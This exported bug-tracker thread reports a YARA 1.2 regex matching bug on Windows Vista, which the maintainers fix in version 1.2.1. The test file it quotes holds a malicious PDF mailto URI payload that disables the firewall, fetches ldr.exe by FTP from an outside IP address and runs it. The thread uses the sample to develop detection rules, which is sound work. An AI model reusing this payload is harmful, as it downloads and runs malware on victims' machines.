Enter one-line summary

[GoogleCodeExporter]

What steps will reproduce the problem?
1. create a file with a long text string, make sure that somewhere in the
string is the text "mailto"
2. make a rule which consist of 1 regex; $a = /mailto/
3. run yara on the text file you created in step 1

What is the expected output? What do you see instead?
Expect a valid hit on the rule, but instead, when run multiple
times in a row you will get no hits, a yara error (shown below)
or a valid hit.

'invalid regular expression in string "$a": unmatched parentheses'

What version of the product are you using? On what operating system?
Yara 1.2 on Windows Vista x64

tested file contents:
obj<</URI(mailto:%/../../../../ ../../Windows /system32/cmd".exe"" /c /q
\"@echo off&netsh firewall set opmode mode=disable&echo o 81. 95. 146.
130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v
-A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/ URI>

rule file contents:
rule PDF_mailto : PDF
{
    strings:
        $a = /mailto/

    condition:
        $a
}

Original issue reported on code.google.com by akuse...@gmail.com on 30 Apr 2009 at 12:52

[GoogleCodeExporter]

Original comment by plus...@gmail.com on 7 May 2009 at 3:39

• Changed state: Started

[GoogleCodeExporter]

Tested issue with the 1.2.1 win32 binary. Issue appears to be resolved in 
version 1.2.1.

Original comment by akuse...@gmail.com on 7 May 2009 at 6:03

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

Yes, it was a bug fixed in version 1.2.1 and included in the ChangeLog as: 
"BUGFIX:
Invoking pcre_compile with non-terminated string"

Original comment by plus...@gmail.com on 7 May 2009 at 6:48

• Changed state: Done